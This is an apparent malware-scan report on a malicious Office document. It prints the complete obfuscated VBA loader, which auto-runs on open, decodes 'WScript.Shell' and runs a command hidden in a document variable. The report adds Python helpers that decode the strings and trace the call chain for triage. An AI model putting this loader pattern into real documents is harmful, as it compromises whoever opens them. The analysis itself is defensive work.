Verdict: MALICIOUS
Risk Score: 188
Malware Insights
MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1204.002 User Execution: Malicious File
The file contains heavily obfuscated VBA macros with three auto-exec entry points (Auto_Open, Document_Open and Workbook_Open), each of which calls EII_F and from there HA_COQ, a common loader shape; Document_Open is Word's ThisDocument event and Workbook_Open is Excel's ThisWorkbook event, which suggests the same module is reused across Word and Excel lures. The critical heuristic 'OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER' fires because HA_COQ instantiates a COM object whose ProgID is rebuilt at run time by the decoder WKN_J (each pair of hex digits becomes a byte, 73 is subtracted, and the result is emitted as a character) and then calls that object's Exec method. Running the literal "A09CACBBB2B9BD779CB1AEB5B5" through that routine yields WScript.Shell. The command handed to Exec is not in the macro source: it is read from the document variable CU6IW (ActiveDocument.Variables("CU6IW").Value) and decoded with the same routine, so the second-stage command line, and any download URL it may contain, can only be recovered from the document's variable table or from a sandbox run. The decoder itself is complete and not truncated. The ten long hex-looking strings assigned in HA_COQ (Z_PEU through JC_W) are never read again; they are decoy data, and they are not even valid WKN_J input (the p-code lengths 0xE3 and 0x10B are odd, so the routine would fail on the trailing digit). Each of them appears once in the source and once in the p-code listing, which accounts for the 20 long blobs reported in the artifact triage below.
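To recover the strings the loader builds at run time, the following Python port of WKN_J, added here as an example and not part of the analyzer or of the sample, decodes every literal passed straight to WKN_J, lists the string variables that are assigned but never read, and names the document variables the macro reads at the Exec sink. SAMPLE_VBA is a constructed, trimmed copy of the macro shown in the preview with the decoy strings shortened; the helper's function names and the regular expressions are the author's own.

```python
"""Added example: triage helper for the loader above (not the analyzer's code).

Ports the macro's WKN_J decoder to Python and runs three checks over VBA
source: decode each literal passed straight to WKN_J, list string variables
that are assigned but never read (decoys), and list the ActiveDocument
variables the macro reads, whose values live in the document, not the macro.
"""
import re
from typing import Dict, List

OFFSET = 73  # the 0x49 subtracted in WKN_J (LitDI2 0x0049 in the p-code listing)


def wkn_j(text: str) -> str:
    """Port of WKN_J: each hex pair -> byte value, minus 73 -> character.

    The macro walks the string with Step 2; on odd-length input it would pass
    a negative value to Chr() and raise a runtime error, so this port rejects
    odd-length input up front instead of silently truncating it. A byte below
    73 likewise raises (chr() of a negative number), matching the VBA failure.
    """
    if len(text) % 2:
        raise ValueError("odd-length input is not decodable by WKN_J")
    return "".join(chr(int(text[i:i + 2], 16) - OFFSET)
                   for i in range(0, len(text), 2))


LITERAL_RE = re.compile(r'WKN_J\("([0-9A-Fa-f]+)"\)')
ASSIGN_RE = re.compile(r'^\s*(\w+)\s*=\s*"[0-9A-Fa-f]+"\s*$', re.M)
DOCVAR_RE = re.compile(r'ActiveDocument\.Variables\("([^"]+)"\)')


def decode_literals(vba: str) -> Dict[str, str]:
    """Every hex literal handed directly to WKN_J, with its decoded value."""
    return {h: wkn_j(h) for h in LITERAL_RE.findall(vba)}


def dead_strings(vba: str) -> List[str]:
    """Variables assigned a hex-looking literal and never mentioned again.

    Two mentions (the Dim and the assignment itself) mean the value is never read.
    """
    return [name for name in ASSIGN_RE.findall(vba)
            if len(re.findall(rf"\b{re.escape(name)}\b", vba)) <= 2]


def document_variables(vba: str) -> List[str]:
    """Document-variable names the macro reads; their values are not in the source."""
    return sorted(set(DOCVAR_RE.findall(vba)))


def triage(vba: str) -> Dict[str, object]:
    """Bundle the three checks so a caller gets one result per sample."""
    return {"decoded_literals": decode_literals(vba),
            "dead_strings": dead_strings(vba),
            "document_variables": document_variables(vba)}


# Constructed input: a trimmed copy of the macro above, decoy strings shortened.
SAMPLE_VBA = '''\
Public Function WKN_J(ByVal text As String)
Dim DP_VBZ As String
Dim I_YU As Long
For I_YU = 1 To Len(text) Step 2
DP_VBZ = DP_VBZ & Chr(Asc(Chr("&H" & Mid(text, I_YU, 2))) - 73)
Next
WKN_J = DP_VBZ
End Function
Public Sub Auto_Open()
Application.Run "EII_F"
End Sub
Sub EII_F()
HA_COQ
End Sub
Public Sub HA_COQ()
Dim BS_KCU As Object: Set BS_KCU = VBA.CreateObject(WKN_J("A09CACBBB2B9BD779CB1AEB5B5"))
Dim Z_PEU As String
Z_PEU = "88885A886B88A15FA6779688B0AD77EA8"
Dim Q_G As String
Q_G = "888888C88881F8888BD88AD889E8E8888"
BS_KCU.Exec (WKN_J(ActiveDocument.Variables("CU6IW").Value))
End Sub
'''

if __name__ == "__main__":
    for key, value in triage(SAMPLE_VBA).items():
        print(key, value)
```

Run it over the full macros.bas instead of SAMPLE_VBA to get the complete decoy list. The value of CU6IW has to come from the document itself (for a binary .doc the user-defined variables sit in the StwUser structure of the Table stream; for OOXML they are w:docVar entries in word/settings.xml) or from a sandbox that dumps ActiveDocument.Variables; once you have it, wkn_j on that value gives the exact command line handed to WScript.Shell.Exec.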
Heuristics (9)
- VBA macros detected (medium; 6 related findings) OLE_VBA_MACROS: Document contains VBA macro code.
- Obfuscated auto-exec VBA loader (critical) OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER: Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  Matched line in script: Public Sub Auto_Open() Application.Run "EII_F" End Sub
- CreateObject call (high) OLE_VBA_CREATEOBJ: CreateObject call.
  Matched line in script: Public Sub HA_COQ() Dim BS_KCU As Object: Set BS_KCU = VBA.CreateObject(WKN_J("A09CACBBB2B9BD779CB1AEB5B5")) Dim Z_PEU As String
- VBA p-code auto-exec with execution tokens (high) OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Document_Open macro (low) OLE_VBA_DOCOPEN: Document_Open macro.
  Matched line in script: End Sub Public Sub Document_Open() Application.Run "EII_F"
- Workbook_Open macro (low) OLE_VBA_WBOPEN: Workbook_Open macro.
  Matched line in script: End Sub Sub Workbook_Open() Application.Run "ThisWorkbook.EII_F"
- Auto_Open macro (low) OLE_VBA_AUTO: Auto_Open macro.
  Matched line in script: End Function Public Sub Auto_Open() Application.Run "EII_F"
- Suspicious extracted artifact (info) EXTRACTED_FILE_STATIC_TRIAGE: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info) EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). This is the DrawingML XML namespace identifier that Office writes into any document with drawing content, not a payload host.
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8791 bytes |

SHA-256: 317dab35ea45790c378706238930caa142ae5175f5d73aed629dace12cba4c7b
Detection: ClamAV: No threats found
Obfuscation or payload: likely. Carved artifact contains 20 long base64-like blob(s).

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit
Public Function WKN_J(ByVal text As String)
Dim DP_VBZ As String
Dim I_YU As Long
For I_YU = 1 To Len(text) Step 2
DP_VBZ = DP_VBZ & Chr(Asc(Chr("&H" & Mid(text, I_YU, 2))) - 73)
Next
WKN_J = DP_VBZ
End Function
Public Sub Auto_Open()
Application.Run "EII_F"
End Sub
Sub EII_F()
HA_COQ
End Sub
Public Sub Document_Open()
Application.Run "EII_F"
End Sub
Public Sub HA_COQ()
Dim BS_KCU As Object: Set BS_KCU = VBA.CreateObject(WKN_J("A09CACBBB2B9BD779CB1AEB5B5"))
Dim Z_PEU As String
Z_PEU = "88885A886B88A15FA6779688B0AD77EA82889E88B0887791608888888893B65960A888508888C75F8855AF8888876EA4888888788891628C885388885F888888984EA08852A7648788A4889394888870A288968797888E886C58888B88BC884DB488694D88885C889988B388877B4C88888"
Dim Q_G As String
Q_G = "888888C88881F8888BD88AD889E8E88886CB555887488C78872888888888888AD70B7AA899E8858888888885D9CA7919988998888BEC14A818854728888AF8870B088C39A88607788888C88885D7FBA9D9C5588615088B67288928866886AA78888BC8888888881C18F887EB788888888C4"
Dim M_KK As String
M_KK = "A24F58A8885156718588C388886B7D4AAF88D19DAF9788884FC3888868BD88889C88A0889688888888B2B28888745B8288695A885F6F88B78888568866A3C64AB2A388AA618B7688C788888888B0886488AB59B37588798888578898945888888888A46D50889A888888885A7091B46888B"
Dim EDQ_HF As String
EDQ_HF = "58886888779B288675A7788886A826188B38888889B62888888AD558888B48875605D75887A66886B8888C38F8888B188C288BE70AC63C68888BB88A6718088938888565688C5954BA2BA88885188888888B688B84E8888888888708988B08879888988A4AE8888BB8888B088885C885C88"
Dim GKS_H As String
GKS_H = "88886288C7525BA888888862C1938A888863916EBA888880885361BC505C88A388C89E8C808888885088C265AB88896088B9C2A166889090889D888888CC678888889E889588B254AD8891BE88887C88645F888EAAC088885388889F886CA4B9889F8888B26D88885BC288885388BB96888"
Dim T_IIP As String
T_IIP = "8C485AFA95488AD88888888A7884E508876888888A098887F884988C082886D886752889367A6889854A788B0594E888888C5888894575A56A6BB8888728850B888888888AC8888BA889588618888889F88B6797367888877858888A9886EA99FBF888A528888B088766088886888888888"
Dim Y_K As String
Y_K = "9C8485888D88884988AA8888B588C588678888C24C4E88884F7281578F7CA288886DC87A618E528C88888888C575889CB8888881809A9088888863B8888860888863B94FA3887FC38988868888AB888888B1878888887688BB8B88B79E8273AE8858B388B1888888888888524F88AE4A708"
Dim SDI_D As String
SDI_D = "86C9FB6888888C788C655885C6DAA9C6758A4884E8888888888888F885F8888887DC7A688536F8854568888BD5B8861999A88B088889A8888958888888AB7887488678888BA6C88888A888870888877A2885488889A758888AB8BA88888888888888CAE88768D88888895A96D8888887D88"
Dim KBE_KE As String
KBE_KE = "8888BC88888889889E6A887B88A18888C48888526EA1B08888868EB49E88888865886F88B4A2B54C509D8888C2886FAD88B45BB78888BD54888888885E4987888888A98888A66B73884A8888BD5BBA674F88C0885D888F8888B7A88851889D888888B4BF88BA92888888C488885A8857C28"
Dim JC_W As String
JC_W = "85C888862888888888A8858C588AC4F88A85E7688B188B0889288C088738888888885B89AC18888888888C8AB528888547D88AC88607C8D8885885294B38874885F88A98879888888A0BFC44D88C7888888887DC081885173888488C18483AB9D8888889E4D888888888888887B5AA0888888738879A1885F8863B3655D708C8EB5ADBF8882"
BS_KCU.Exec (WKN_J(ActiveDocument.Variables("CU6IW").Value))
End Sub
Sub Workbook_Open()
Application.Run "ThisWorkbook.EII_F"
End Sub
' Processing file: /opt/analyzer/scan_staging/e8e2f2d5f3504a78b48915ff11009dda.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 7499 bytes
' Line #0:
' Option (Explicit)
' Line #1:
' FuncDefn (Public Function WKN_J(ByVal Text As String))
' Line #2:
' Dim
' VarDefn DP_VBZ (As String)
' Line #3:
' Dim
' VarDefn I_YU (As Long)
' Line #4:
' StartForVariable
' Ld I_YU
' EndForVariable
' LitDI2 0x0001
' Ld Text
' FnLen
' LitDI2 0x0002
' ForStep
' Line #5:
' Ld DP_VBZ
' LitStr 0x0002 "&H"
' Ld Text
' Ld I_YU
' LitDI2 0x0002
' ArgsLd Mid 0x0003
' Concat
' ArgsLd Chr 0x0001
' ArgsLd Asc 0x0001
' LitDI2 0x0049
' Sub
' ArgsLd Chr 0x0001
' Concat
' St DP_VBZ
' Line #6:
' StartForVariable
' Next
' Line #7:
' Ld DP_VBZ
' St WKN_J
' Line #8:
' EndFunc
' Line #9:
' FuncDefn (Public Sub Auto_Open())
' Line #10:
' LitStr 0x0005 "EII_F"
' Ld Application
' ArgsMemCall Run 0x0001
' Line #11:
' EndSub
' Line #12:
' FuncDefn (Sub EII_F())
' Line #13:
' ArgsCall HA_COQ 0x0000
' Line #14:
' EndSub
' Line #15:
' FuncDefn (Public Sub Document_Open())
' Line #16:
' LitStr 0x0005 "EII_F"
' Ld Application
' ArgsMemCall Run 0x0001
' Line #17:
' EndSub
' Line #18:
' FuncDefn (Public Sub HA_COQ())
' Line #19:
' Dim
' VarDefn BS_KCU (As Object)
' BoS 0x0000
' SetStmt
' LitStr 0x001A "A09CACBBB2B9BD779CB1AEB5B5"
' ArgsLd WKN_J 0x0001
' Ld VBA
' ArgsMemLd CreateObject 0x0001
' Set BS_KCU
' Line #20:
' Dim
' VarDefn Z_PEU (As String)
' Line #21:
' LitStr 0x00E3 "88885A886B88A15FA6779688B0AD77EA82889E88B0887791608888888893B65960A888508888C75F8855AF8888876EA4888888788891628C885388885F888888984EA08852A7648788A4889394888870A288968797888E886C58888B88BC884DB488694D88885C889988B388877B4C88888"
' St Z_PEU
' Line #22:
' Dim
' VarDefn Q_G (As String)
' Line #23:
' LitStr 0x00E3 "888888C88881F8888BD88AD889E8E88886CB555887488C78872888888888888AD70B7AA899E8858888888885D9CA7919988998888BEC14A818854728888AF8870B088C39A88607788888C88885D7FBA9D9C5588615088B67288928866886AA78888BC8888888881C18F887EB788888888C4"
' St Q_G
' Line #24:
' Dim
' VarDefn M_KK (As String)
' Line #25:
' LitStr 0x00E3 "A24F58A8885156718588C388886B7D4AAF88D19DAF9788884FC3888868BD88889C88A0889688888888B2B28888745B8288695A885F6F88B78888568866A3C64AB2A388AA618B7688C788888888B0886488AB59B37588798888578898945888888888A46D50889A888888885A7091B46888B"
' St M_KK
' Line #26:
' Dim
' VarDefn EDQ_HF (As String)
' Line #27:
' LitStr 0x00E3 "58886888779B288675A7788886A826188B38888889B62888888AD558888B48875605D75887A66886B8888C38F8888B188C288BE70AC63C68888BB88A6718088938888565688C5954BA2BA88885188888888B688B84E8888888888708988B08879888988A4AE8888BB8888B088885C885C88"
' St EDQ_HF
' Line #28:
' Dim
' VarDefn GKS_H (As String)
' Line #29:
' LitStr 0x00E3 "88886288C7525BA888888862C1938A888863916EBA888880885361BC505C88A388C89E8C808888885088C265AB88896088B9C2A166889090889D888888CC678888889E889588B254AD8891BE88887C88645F888EAAC088885388889F886CA4B9889F8888B26D88885BC288885388BB96888"
' St GKS_H
' Line #30:
' Dim
' VarDefn T_IIP (As String)
' Line #31:
' LitStr 0x00E3 "8C485AFA95488AD88888888A7884E508876888888A098887F884988C082886D886752889367A6889854A788B0594E888888C5888894575A56A6BB8888728850B888888888AC8888BA889588618888889F88B6797367888877858888A9886EA99FBF888A528888B088766088886888888888"
' St T_IIP
' Line #32:
' Dim
' VarDefn Y_K (As String)
' Line #33:
' LitStr 0x00E3 "9C8485888D88884988AA8888B588C588678888C24C4E88884F7281578F7CA288886DC87A618E528C88888888C575889CB8888881809A9088888863B8888860888863B94FA3887FC38988868888AB888888B1878888887688BB8B88B79E8273AE8858B388B1888888888888524F88AE4A708"
' St Y_K
' Line #34:
' Dim
' VarDefn SDI_D (As String)
' Line #35:
' LitStr 0x00E3 "86C9FB6888888C788C655885C6DAA9C6758A4884E8888888888888F885F8888887DC7A688536F8854568888BD5B8861999A88B088889A8888958888888AB7887488678888BA6C88888A888870888877A2885488889A758888AB8BA88888888888888CAE88768D88888895A96D8888887D88"
' St SDI_D
' Line #36:
' Dim
' VarDefn KBE_KE (As String)
' Line #37:
' LitStr 0x00E3 "8888BC88888889889E6A887B88A18888C48888526EA1B08888868EB49E88888865886F88B4A2B54C509D8888C2886FAD88B45BB78888BD54888888885E4987888888A98888A66B73884A8888BD5BBA674F88C0885D888F8888B7A88851889D888888B4BF88BA92888888C488885A8857C28"
' St KBE_KE
' Line #38:
' Dim
' VarDefn JC_W (As String)
' Line #39:
' LitStr 0x010B "85C888862888888888A8858C588AC4F88A85E7688B188B0889288C088738888888885B89AC18888888888C8AB528888547D88AC88607C8D8885885294B38874885F88A98879888888A0BFC44D88C7888888887DC081885173888488C18483AB9D8888889E4D888888888888887B5AA0888888738879A1885F8863B3655D708C8EB5ADBF8882"
' St JC_W
' Line #40:
' Line #41:
' LitStr 0x0005 "CU6IW"
' Ld ActiveDocument
' ArgsMemLd Variables 0x0001
' MemLd Value
' ArgsLd WKN_J 0x0001
' Paren
' Ld BS_KCU
' ArgsMemCall Exec 0x0001
' Line #42:
' EndSub
' Line #43:
' FuncDefn (Sub Workbook_Open())
' Line #44:
' LitStr 0x0012 "ThisWorkbook.EII_F"
' Ld Application
' ArgsMemCall Run 0x0001
' Line #45:
' EndSub
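When source extraction fails and only the compiled stream is available (the case OLE_VBA_PCODE_AUTOEXEC_EXEC is meant to cover), the same entry-point-to-sink chain can be rebuilt from a pcodedmp listing like the one above. The following Python helper is an added example, not the analyzer's code; SAMPLE_DUMP is a constructed, trimmed copy of that listing with the WKN_J body and the decoy literal shortened, and the AUTOEXEC and SINKS name sets are the author's choices.

```python
"""Added example: rebuild the auto-exec call chain from a pcodedmp listing.

Groups the disassembly by FuncDefn, treats ArgsCall and Application.Run "Name"
as call edges, and reports every execution sink reachable from an auto-exec
entry point together with the string literal pushed just before the sink
(for CreateObject that is the encoded ProgID, for Exec the document-variable
name whose value supplies the command).
"""
import re
from typing import Dict, List, Tuple

# Author's choice of entry points and sinks; extend for other hosts as needed.
AUTOEXEC = {"Auto_Open", "AutoOpen", "Document_Open", "Workbook_Open",
            "AutoExec", "Auto_Close", "AutoClose", "Document_Close"}
SINKS = {"CreateObject", "Exec", "Shell", "Run"}

FUNCDEFN_RE = re.compile(r"FuncDefn \((?:Public |Private )?(?:Sub|Function) (\w+)")
LITSTR_RE = re.compile(r'LitStr 0x[0-9A-Fa-f]+ "([^"]*)"')
ARGSCALL_RE = re.compile(r"ArgsCall (\w+) 0x")
MEMCALL_RE = re.compile(r"ArgsMem(?:Call|Ld) (\w+) 0x")


def split_procs(dump: str) -> Dict[str, List[str]]:
    """Group listing lines by the procedure that owns them (comment prefix stripped)."""
    procs: Dict[str, List[str]] = {}
    current = None
    for raw in dump.splitlines():
        line = raw.lstrip("' ").strip()
        m = FUNCDEFN_RE.search(line)
        if m:
            current = m.group(1)
            procs[current] = []
        elif current is not None:
            procs[current].append(line)
    return procs


def analyse_proc(ops: List[str]) -> Tuple[List[str], List[Tuple[str, str]]]:
    """Return (callees, sinks) for one procedure.

    callees: targets of ArgsCall and of Application.Run "Name".
    sinks:   (sink name, last string literal pushed before it).
    """
    callees: List[str] = []
    sinks: List[Tuple[str, str]] = []
    last_lit = ""
    for i, op in enumerate(ops):
        lit = LITSTR_RE.search(op)
        if lit:
            last_lit = lit.group(1)
            continue
        call = ARGSCALL_RE.search(op)
        if call:
            callees.append(call.group(1))
            continue
        mem = MEMCALL_RE.search(op)
        if not mem:
            continue
        name = mem.group(1)
        # Application.Run "ThisWorkbook.EII_F" is a call edge, not a sink.
        if name == "Run" and any("Ld Application" in p for p in ops[max(0, i - 2):i]):
            callees.append(last_lit.split(".")[-1])
        elif name in SINKS:
            sinks.append((name, last_lit))
    return callees, sinks


def auto_exec_chains(dump: str) -> Dict[str, List[Tuple[str, str, str]]]:
    """entry point -> [(procedure holding the sink, sink, preceding literal), ...]"""
    procs = {name: analyse_proc(ops) for name, ops in split_procs(dump).items()}
    result: Dict[str, List[Tuple[str, str, str]]] = {}
    for entry in sorted(AUTOEXEC & set(procs)):
        seen, stack, found = set(), [entry], []
        while stack:  # depth-first walk over the call edges
            name = stack.pop()
            if name in seen or name not in procs:
                continue
            seen.add(name)
            callees, sinks = procs[name]
            found.extend((name, sink, lit) for sink, lit in sinks)
            stack.extend(callees)
        result[entry] = found
    return result


# Constructed input: trimmed copy of the listing above (WKN_J body and decoy literal cut).
SAMPLE_DUMP = """\
' FuncDefn (Public Function WKN_J(ByVal Text As String))
' LitDI2 0x0049
' EndFunc
' FuncDefn (Public Sub Auto_Open())
' LitStr 0x0005 "EII_F"
' Ld Application
' ArgsMemCall Run 0x0001
' EndSub
' FuncDefn (Sub EII_F())
' ArgsCall HA_COQ 0x0000
' EndSub
' FuncDefn (Public Sub Document_Open())
' LitStr 0x0005 "EII_F"
' Ld Application
' ArgsMemCall Run 0x0001
' EndSub
' FuncDefn (Public Sub HA_COQ())
' LitStr 0x001A "A09CACBBB2B9BD779CB1AEB5B5"
' ArgsLd WKN_J 0x0001
' Ld VBA
' ArgsMemLd CreateObject 0x0001
' Set BS_KCU
' LitStr 0x00E3 "88885A886B88A15F"
' St Z_PEU
' LitStr 0x0005 "CU6IW"
' Ld ActiveDocument
' ArgsMemLd Variables 0x0001
' MemLd Value
' ArgsLd WKN_J 0x0001
' Ld BS_KCU
' ArgsMemCall Exec 0x0001
' EndSub
' FuncDefn (Sub Workbook_Open())
' LitStr 0x0012 "ThisWorkbook.EII_F"
' Ld Application
' ArgsMemCall Run 0x0001
' EndSub
"""

if __name__ == "__main__":
    for entry, hits in auto_exec_chains(SAMPLE_DUMP).items():
        print(entry, "->", hits)
```

The literal attached to CreateObject is the encoded ProgID and the one attached to Exec is only the name of the document variable, so even from p-code alone the analyst learns that the command must be fetched from the document rather than from the macro stream; the decoder's offset is visible as the LitDI2 0x0049 pushed inside WKN_J.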